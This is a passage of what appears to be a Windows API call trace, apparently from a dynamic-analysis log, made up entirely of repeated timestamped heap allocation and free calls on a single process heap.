[0144.807] GetProcessHeap () returned 0xe30000 [0144.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0144.808] GetProcessHeap () returned 0xe30000 [0144.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0144.809] GetProcessHeap () returned 0xe30000 [0144.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0144.809] GetProcessHeap () returned 0xe30000 [0144.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0144.810] GetProcessHeap () returned 0xe30000 [0144.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0144.810] GetProcessHeap () returned 0xe30000 [0144.811] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.811] GetProcessHeap () returned 0xe30000 [0144.811] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0144.812] GetProcessHeap () returned 0xe30000 [0144.812] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.813] GetProcessHeap () returned 0xe30000 [0144.813] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.813] GetProcessHeap () returned 0xe30000 [0144.814] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0144.814] GetProcessHeap () returned 0xe30000 [0144.814] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0144.814] GetProcessHeap () returned 0xe30000 [0144.815] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] 